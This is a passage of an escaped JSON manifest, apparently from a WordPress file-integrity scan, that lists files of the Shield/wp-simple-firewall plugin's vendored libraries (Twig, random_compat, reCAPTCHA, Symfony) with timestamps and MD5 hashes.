/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/ParentExpression.php\":{\"d\":1567917024,\"h\":\"5e8eef1a3dd0d9a9bca06152828edf4a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/FilterExpression.php\":{\"d\":1567917024,\"h\":\"17f312cb547832eb531a02df8bbf2361\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/ArrowFunctionExpression.php\":{\"d\":1567917024,\"h\":\"fad5b659f2fff3636ca1c7ef1a9d84ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/ConstantExpression.php\":{\"d\":1567917024,\"h\":\"e1d60af11430d1fe99d71060ff419290\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/ConditionalExpression.php\":{\"d\":1567917024,\"h\":\"2f47ccb7652d5ea7885c38d1f924df76\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/AssignNameExpression.php\":{\"d\":1567917024,\"h\":\"cc5bfb4184c9baef68b97b9293d34d99\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/MethodCallExpression.php\":{\"d\":1567917024,\"h\":\"c4ea21df31e0b128d0ff4c0678307f40\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/ArrayExpression.php\":{\"d\":1567917024,\"h\":\"ce49f5f454bb932cf981e8e50b585ad6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/TestExpression.php\":{\"d\":1567917024,\"h\":\"6be361e1070bc64276802f80fd6542da\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/InlinePrint.php\":{\"d\":1567917024,\"h\":\"8033af7464e2cb9ae87d6ee343abed2a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/TempNameExpression.php\":{\"d\":1567917024,\"h\":\"0c5f00038e513b69ea88e9af59813392\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Expression\\/FunctionExpression.php\":{\"d\":1567917024,\"h\":\"9c8f4ffdf1e1c2c568a699189faaccd3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/WithNode.php\":{\"d\":1567917024,\"h\":\"d58187c0da435b05dbbbf09f2284a58b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/BlockReferenceNode.php\":{\"d\":1567917024,\"h\":\"92a7112d4f25298fbec8961437cdf4b3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/BodyNode.php\":{\"d\":1567917024,\"h\":\"986ca7ce4713c6d7edfb46e7ec1f5e3c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/FlushNode.php\":{\"d\":1567917024,\"h\":\"57b3532a899ef0e1982f2ef6cae12661\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/ModuleNode.php\":{\"d\":1567917024,\"h\":\"2c7560df59a620d24403c1d2d1960d0d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/NodeOutputInterface.php\":{\"d\":1567917024,\"h\":\"dc306c16a9fec4e8131a4759d5fd64f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/CheckToStringNode.php\":{\"d\":1567917024,\"h\":\"aed732468557aa7452e811c9f4714225\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/BlockNode.php\":{\"d\":1567917024,\"h\":\"97ea179a615d5d2c5ff6b90b459377e3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/DeprecatedNode.php\":{\"d\":1567917024,\"h\":\"9b204a25e34b0821ffe5de21a36433cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/AutoEscapeNode.php\":{\"d\":1567917024,\"h\":\"2c55c1ff619165ae24547b44c1194445\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/ImportNode.php\":{\"d\":1567917024,\"h\":\"b9b814fdb9af405da68db48540ee48ca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/CheckSecurityNode.php\":{\"d\":1567917024,\"h\":\"ed66056587fa42e49f7c4c186185cf45\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/Node.php\":{\"d\":1567917024,\"h\":\"b0680196ba89ca47e10103b3b531c14c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/IfNode.php\":{\"d\":1567917024,\"h\":\"a572c70775120ad6ece493223bd70025\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/SandboxNode.php\":{\"d\":1567917024,\"h\":\"bbdad2a3286f74417db855fae7ad0b5c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/EmbedNode.php\":{\"d\":1567917024,\"h\":\"29ef69b498d3c6e2adbf48defcfdbbb5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/SetTempNode.php\":{\"d\":1567917024,\"h\":\"885249b2273600311a37e0ccd447bb42\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/TextNode.php\":{\"d\":1567917024,\"h\":\"b73cfa8d24ef5545d6e6c1eeab83913f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/PrintNode.php\":{\"d\":1567917024,\"h\":\"1a9d90a02a9395c7e1a6b28087bc4be3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/SpacelessNode.php\":{\"d\":1567917024,\"h\":\"2d3c8755c73bed018a3ce411a595b1c9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/ForNode.php\":{\"d\":1567917024,\"h\":\"af91e29f641bcca7f345647eabb05786\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/IncludeNode.php\":{\"d\":1567917024,\"h\":\"f44350904ee58443be53485d6198ff85\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/ForLoopNode.php\":{\"d\":1567917024,\"h\":\"ae58208e3094d0bbb8c6b331a6415325\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/SetNode.php\":{\"d\":1567917024,\"h\":\"046328f3002248db09e4d2a89f14d103\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/DoNode.php\":{\"d\":1567917024,\"h\":\"2eda4c45ba8b695fbdf8126ed4a2be08\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/NodeCaptureInterface.php\":{\"d\":1567917024,\"h\":\"c431522464753dc23e9e06651dcca6b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/SandboxedPrintNode.php\":{\"d\":1567917024,\"h\":\"363fce5057b33e6a8761f6475947e8b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Node\\/MacroNode.php\":{\"d\":1567917024,\"h\":\"8e1087156b9bbf9186693023f5cdb339\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Util\\/DeprecationCollector.php\":{\"d\":1567917024,\"h\":\"942cb3a3f6794ca867a3e6b2c2de9ba1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Util\\/TemplateDirIterator.php\":{\"d\":1567917024,\"h\":\"95e8577b871e6576d437d31832f09155\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Test\\/NodeTestCase.php\":{\"d\":1567917024,\"h\":\"125f5fd18c36eaa693b752a4d7476daf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Test\\/IntegrationTestCase.php\":{\"d\":1567917024,\"h\":\"e5c7b569e8cc8eadf160d3fa57ba3aa6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Cache\\/NullCache.php\":{\"d\":1567917024,\"h\":\"fa98d9d6ed44f56b84a228b2dada9e8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Cache\\/CacheInterface.php\":{\"d\":1567917024,\"h\":\"13f38b201b8bfe6b57d969ce8fbacf1a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Cache\\/FilesystemCache.php\":{\"d\":1567917024,\"h\":\"205c0bee39c6547a58af16018bfba5d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Sandbox\\/SecurityPolicy.php\":{\"d\":1567917024,\"h\":\"9ed28a2052d738a6b80bff0700698cff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Sandbox\\/SecurityPolicyInterface.php\":{\"d\":1567917024,\"h\":\"d52874981b38a6c5a0ef57029ae7fbec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Sandbox\\/SecurityError.php\":{\"d\":1567917024,\"h\":\"15844b0e64f84351308fbb19ab527b7e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Sandbox\\/SecurityNotAllowedFunctionError.php\":{\"d\":1567917024,\"h\":\"ab487ec3041846a0172ff59e388db827\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Sandbox\\/SecurityNotAllowedTagError.php\":{\"d\":1567917024,\"h\":\"9759fb37627bfa4ad59e83eeebbd3859\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Sandbox\\/SecurityNotAllowedPropertyError.php\":{\"d\":1567917024,\"h\":\"126b8f204ffc4e34db381592cba2d03a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Sandbox\\/SecurityNotAllowedMethodError.php\":{\"d\":1567917024,\"h\":\"cd7077cf541307775e25d34b3860e1d9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Sandbox\\/SecurityNotAllowedFilterError.php\":{\"d\":1567917024,\"h\":\"e55b4abc2a4ad5a836d2b0cfcec0e56d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Markup.php\":{\"d\":1567917024,\"h\":\"04a575426a4c4a911e48d09c0e37fbe1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TemplateWrapper.php\":{\"d\":1567917024,\"h\":\"2e4be076b56a6b01ae8259e6f3f2af07\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Lexer.php\":{\"d\":1567917024,\"h\":\"efec34cdc4c00c878e699f6232c0c8e7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/ExpressionParser.php\":{\"d\":1567917024,\"h\":\"6641a312ccb0dbdef3867dd37af37d55\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Source.php\":{\"d\":1567917024,\"h\":\"7c28d26af6d13610023779507d9f6d5a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TokenStream.php\":{\"d\":1567917024,\"h\":\"1848541512aedbc4fcefb7b84c4cd3b3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TwigFilter.php\":{\"d\":1567917024,\"h\":\"6997d5d7cfc92d3a10e525f68ba05277\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Template.php\":{\"d\":1567917024,\"h\":\"d320420560f11c944bd1c0ad1be1f2b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Compiler.php\":{\"d\":1567917024,\"h\":\"47e391f784152c9fd3bb838e18a99145\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TwigFunction.php\":{\"d\":1567917024,\"h\":\"29d66df1a8526c1190f4434f314a259d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/TwigTest.php\":{\"d\":1567917024,\"h\":\"f204c330acbda7993a2dc262c61b7627\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Environment.php\":{\"d\":1567917024,\"h\":\"c64e15043a687bb3e418660a352870ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Token.php\":{\"d\":1567917024,\"h\":\"e5728a1e9926ae153bdcfb95a0712c97\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/FileExtensionEscapingStrategy.php\":{\"d\":1567917024,\"h\":\"012bf2f6bb81f53138e3457116eac0c6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/Parser.php\":{\"d\":1567917024,\"h\":\"c735e04ef2e41d3fb6934c7038ec2bba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/twig\\/twig\\/src\\/NodeTraverser.php\":{\"d\":1567917024,\"h\":\"730486d6ae853d34a512ed12c93fb8c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/dist\\/random_compat.phar.pubkey\":{\"d\":1567917024,\"h\":\"36dae3cf3fd10ae5093aaec29b7b5125\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/dist\\/random_compat.phar.pubkey.asc\":{\"d\":1567917024,\"h\":\"3ec788adbb0519a92243e569789cfcb9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/lib\\/random_bytes_com_dotnet.php\":{\"d\":1567917024,\"h\":\"062d36d41c22af3f24625bc58144835f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/lib\\/random_int.php\":{\"d\":1567917024,\"h\":\"39a119c9afaebb018caa5e3f0dea3eb4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/lib\\/random_bytes_mcrypt.php\":{\"d\":1567917024,\"h\":\"46d5eb6fac0c2981b70f879a82649ae3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/lib\\/error_polyfill.php\":{\"d\":1567917024,\"h\":\"a5862c390f82e0eef09f9ad9c147b811\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/lib\\/random_bytes_libsodium_legacy.php\":{\"d\":1567917024,\"h\":\"c6ea1aff1de4231c937abaa7a64be6ae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/lib\\/random.php\":{\"d\":1567917024,\"h\":\"ebf7c66a2e660b0fef9d599715f31c47\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/lib\\/cast_to_int.php\":{\"d\":1567917024,\"h\":\"79297a8a910b48162ff884043efc1612\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/lib\\/random_bytes_dev_urandom.php\":{\"d\":1567917024,\"h\":\"1f3482decf6b49549fa5dfc03dd6802f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/lib\\/random_bytes_libsodium.php\":{\"d\":1567917024,\"h\":\"78479b3f06ef4d06788a96afba6c7ccc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/paragonie\\/random_compat\\/lib\\/byte_safe_strings.php\":{\"d\":1567917024,\"h\":\"73d9b996e37833b33843da6698358d63\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/google\\/recaptcha\\/src\\/ReCaptcha\\/RequestMethod\\/Curl.php\":{\"d\":1567917024,\"h\":\"9c2d4dcccd856cf78728eff4c726f1b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/google\\/recaptcha\\/src\\/ReCaptcha\\/RequestMethod\\/SocketPost.php\":{\"d\":1567917024,\"h\":\"cd004eac22810c16a508eeec7aa4427c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/google\\/recaptcha\\/src\\/ReCaptcha\\/RequestMethod\\/Socket.php\":{\"d\":1567917024,\"h\":\"59bea501575eddcab64f2c02c73f28e3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/google\\/recaptcha\\/src\\/ReCaptcha\\/RequestMethod\\/CurlPost.php\":{\"d\":1567917024,\"h\":\"8733caf76b9179eccbeb744a109c7e8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/google\\/recaptcha\\/src\\/ReCaptcha\\/RequestMethod\\/Post.php\":{\"d\":1567917024,\"h\":\"6823914c4f0dd64b48441c578c78a022\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/google\\/recaptcha\\/src\\/ReCaptcha\\/RequestParameters.php\":{\"d\":1567917024,\"h\":\"60f8dd8323eb5a2e877747a070f2d2b2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/google\\/recaptcha\\/src\\/ReCaptcha\\/RequestMethod.php\":{\"d\":1567917024,\"h\":\"c54c9a8feba7dda1c84059a1b8bbc4b1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/google\\/recaptcha\\/src\\/ReCaptcha\\/ReCaptcha.php\":{\"d\":1567917024,\"h\":\"812c523a80378bf288ea80267e15ec8d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/google\\/recaptcha\\/src\\/ReCaptcha\\/Response.php\":{\"d\":1567917024,\"h\":\"a79b779bce211a6b270c6137148de195\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/google\\/recaptcha\\/src\\/autoload.php\":{\"d\":1567917024,\"h\":\"9a9e161b0deb63815ec1967fee8ae041\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/yaml\\/Exception\\/RuntimeException.php\":{\"d\":1567917024,\"h\":\"14010c4f6f5c12606dd5e00ef5855fdc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/yaml\\/Exception\\/DumpException.php\":{\"d\":1567917024,\"h\":\"dc67a59a9101373a0a0aab4d1a37406b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/yaml\\/Exception\\/ExceptionInterface.php\":{\"d\":1567917024,\"h\":\"55d4a87d030efc9426685250882fdf25\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/yaml\\/Exception\\/ParseException.php\":{\"d\":1567917024,\"h\":\"ba83e463c16a0e1668cf0e805e725d15\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/yaml\\/Inline.php\":{\"d\":1567917024,\"h\":\"38c3843dbe14eff3b8a98405bf65e0a8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/yaml\\/Unescaper.php\":{\"d\":1567917024,\"h\":\"40396d53f0098edcde3f9af23027517d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/yaml\\/Dumper.php\":{\"d\":1567917024,\"h\":\"04604771d1e476d186195c147801f305\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/yaml\\/Yaml.php\":{\"d\":1567917024,\"h\":\"78a6da237baf9ac7c901bf2f6fac63f9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/yaml\\/Escaper.php\":{\"d\":1567917024,\"h\":\"21458379ea80c0095597a7b14777cb73\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/yaml\\/Parser.php\":{\"d\":1567917024,\"h\":\"c9d6556834f295d8371277848ffe56e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/polyfill-mbstring\\/Resources\\/unidata\\/titleCaseRegexp.php\":{\"d\":1567917024,\"h\":\"a161350864050f78bf9161f7f3c94172\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/polyfill-mbstring\\/Resources\\/unidata\\/lowerCase.php\":{\"d\":1567917024,\"h\":\"fe16e76b8e2cf1c8ebe15ae241c42b13\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/polyfill-mbstring\\/Resources\\/unidata\\/upperCase.php\":{\"d\":1567917024,\"h\":\"a5f2c4c9a4432778a21079d9090a5ada\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/polyfill-mbstring\\/bootstrap.php\":{\"d\":1567917024,\"h\":\"8000776f72b3164cfd6ed7ef25ae6613\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/polyfill-mbstring\\/Mbstring.php\":{\"d\":1567917024,\"h\":\"46d51dc2b70a1c4c8d60e38cd041e6ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wp-simple-firewall\\/src\\/lib\\/vendor\\/symfony\\/translation\\/DataCollector\\/TranslationDataCollector.php\":{\"d\":1567917024,\"h\":\"b3cd6d57d9afa5137f91688da5b0f1db\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plu